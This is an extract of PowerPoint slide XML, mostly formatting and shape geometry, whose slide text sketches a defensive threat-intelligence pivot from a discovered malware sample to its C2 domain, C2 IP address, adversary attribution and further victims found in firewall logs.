                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Victim</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1800" spc="-7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25">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>discovers </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1800" spc="-46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60">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>malware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12202" y="4195317"/>
            <a:ext cx="126047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635">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1800" spc="50">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Malware </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1800" spc="5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40">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>contains</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1800" spc="-7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70">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>C2 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1800" spc="-46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80">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>domain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90290" y="4124959"/>
            <a:ext cx="21107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6850" marR="5080" indent="-184785">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1800" spc="-70">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>C2</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1800" spc="-4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80">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>domain</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1800" spc="-6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20">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>resolves </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1800" spc="-46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110">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1800" spc="-3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70">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>C2</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1800" spc="-3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60">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1800" spc="-2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35">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>address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763515" y="2954223"/>
            <a:ext cx="1910080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775335">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1800" spc="-60">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1800" spc="-1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5">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1800" spc="85">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>ddr</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1800" spc="85">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1800" spc="-40">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>ss  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1800" spc="70">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>ownership</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1800" spc="-10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40">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>details </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1800" spc="-46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25">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>reveal</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1800" spc="-2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30">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>adversary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57065" y="6335395"/>
            <a:ext cx="263271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L="12700" marR="5080" indent="595630">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1800" spc="20">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Firewall</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1800" spc="-5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15">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>logs</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1800" spc="-5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25">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>reveal </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1800" spc="-46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100">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>further </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1800" spc="40">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>victims </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1800" spc="4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45">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>cont</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1800" spc="50">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1800" spc="35">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>ctin</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1800" spc="55">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1800" spc="-1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70">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>C2</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1800" spc="-3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60">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1800" spc="-10">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t> a</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1800" spc="40">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>ddress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934200" y="3332988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5" h="437514">
                <a:moveTo>
                  <a:pt x="218694" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="168550" y="5776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="122519" y="22229"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81913" y="48045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48045" y="81913"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22229" y="122519"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5776" y="168550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="218694"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5776" y="268837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22229" y="314868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48045" y="355474"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81913" y="389342"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="122519" y="415158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="168550" y="431611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="218694" y="437388"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="268837" y="431611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="314868" y="415158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="355474" y="389342"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="389342" y="355474"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="415158" y="314868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="431611" y="268837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="437388" y="218694"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="431611" y="168550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="415158" y="122519"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="389342" y="81913"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="355474" y="48045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="314868" y="22229"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="268837" y="5776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="218694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7082408" y="3407155"/>
            <a:ext cx="1416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30" b="1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85688" y="4294632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4" h="437514">
                <a:moveTo>
                  <a:pt x="218694" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="168550" y="5776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="122519" y="22229"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81913" y="48045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48045" y="81913"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22229" y="122519"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5776" y="168550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="218693"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5776" y="268837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22229" y="314868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48045" y="355474"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81913" y="389342"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="122519" y="415158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="168550" y="431611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="218694" y="437388"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="268837" y="431611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="314868" y="415158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="355474" y="389342"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="389342" y="355474"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="415158" y="314868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="431611" y="268837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="437388" y="218693"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="431611" y="168550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="415158" y="122519"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="389342" y="81913"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="355474" y="48045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="314868" y="22229"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="268837" y="5776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="218694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6033896" y="4369054"/>
            <a:ext cx="1416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30" b="1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688835" y="6486144"/>
            <a:ext cx="436245" cy="437515"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="436245" h="437515">
                <a:moveTo>
                  <a:pt x="217932" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="167951" y="5776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="122075" y="22229"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81611" y="48045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47866" y="81913"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22144" y="122519"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5753" y="168550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="218693"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5753" y="268837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22144" y="314868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47866" y="355474"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81611" y="389342"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="122075" y="415158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="167951" y="431611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="217932" y="437387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267912" y="431611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313788" y="415158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="354252" y="389342"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="387997" y="355474"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="413719" y="314868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="430110" y="268837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="435864" y="218693"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="430110" y="168550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="413719" y="122519"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="387997" y="81913"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="354252" y="48045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313788" y="22229"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267912" y="5776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="217932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6836791" y="6560946"/>
            <a:ext cx="1416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30" b="1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278111" y="6502907"/>
            <a:ext cx="436245" cy="437515"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="436245" h="437515">
                <a:moveTo>
                  <a:pt x="217932" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="167951" y="5776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="122075" y="22229"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81611" y="48045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47866" y="81913"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22144" y="122519"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5753" y="168550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="218694"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5753" y="268837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22144" y="314868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47866" y="355474"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81611" y="389342"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="122075" y="415158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="167951" y="431611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="217932" y="437388"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267912" y="431611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313788" y="415158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="354252" y="389342"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="387997" y="355474"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="413719" y="314868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="430110" y="268837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="435864" y="218694"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="430110" y="168550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="413719" y="122519"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="387997" y="81913"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="354252" y="48045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313788" y="22229"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267912" y="5776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="217932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9425685" y="6577710"/>
            <a:ext cx="1416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30" b="1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086343" y="3767328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5" h="437514">
                <a:moveTo>
                  <a:pt x="218694" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="168550" y="5776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="122519" y="22229"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81913" y="48045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48045" y="81913"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22229" y="122519"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5776" y="168550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="218694"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5776" y="268837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22229" y="314868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48045" y="355474"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81913" y="389342"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="122519" y="415158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="168550" y="431611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="218694" y="437388"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="268837" y="431611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="314868" y="415158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="355474" y="389342"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="389342" y="355474"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="415158" y="314868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="431611" y="268837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="437387" y="218694"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="431611" y="168550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="415158" y="122519"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="389342" y="81913"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="355474" y="48045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="314868" y="22229"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="268837" y="5776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="218694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8235188" y="3841750"/>
            <a:ext cx="1416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30" b="1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268595" y="4847590"/>
            <a:ext cx="1613535" cy="408940"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1613534" h="408939">
                <a:moveTo>
                  <a:pt x="1107549" y="57150"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="732663" y="57150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="785367" y="57785"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="838072" y="60833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="890777" y="66548"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="943355" y="74802"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="995806" y="85471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1048003" y="98679"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1099692" y="114426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1151127" y="132587"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1201546" y="153415"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1251584" y="176530"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1300860" y="202311"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1349121" y="230377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1396364" y="260985"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1442593" y="294132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1487551" y="329819"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1531365" y="367919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1573783" y="408432"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1613280" y="367157"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1568957" y="324865"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1522983" y="284988"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1475866" y="247776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1427352" y="213106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1377823" y="180975"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1327277" y="151637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1275587" y="124713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1223264" y="100457"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1170051" y="78739"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1116329" y="59817"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1107549" y="57150"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1613534" h="408939">
                <a:moveTo>
                  <a:pt x="75945" y="154559"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="330581"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="186308" y="285750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="166009" y="261620"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126237" y="261620"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="92328" y="215519"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="113902" y="199678"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75945" y="154559"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1613534" h="408939">
                <a:moveTo>
                  <a:pt x="113902" y="199678"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="92328" y="215519"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126237" y="261620"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="150823" y="243567"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="113902" y="199678"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1613534" h="408939">
                <a:moveTo>
                  <a:pt x="150823" y="243567"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="126237" y="261620"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="166009" y="261620"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="150823" y="243567"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1613534" h="408939">
                <a:moveTo>
                  <a:pt x="730630" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="675513" y="2032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="620521" y="6604"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="566038" y="13970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="511937" y="24002"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="458469" y="36575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="405638" y="51943"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="353694" y="69976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="302640" y="90677"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="252602" y="114046"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="203580" y="140081"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="154939" y="169545"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="113902" y="199678"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="150823" y="243567"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="188849" y="215646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="233171" y="188975"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="279400" y="164464"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="326770" y="142494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="375157" y="122936"/>
                </a:lnTo>
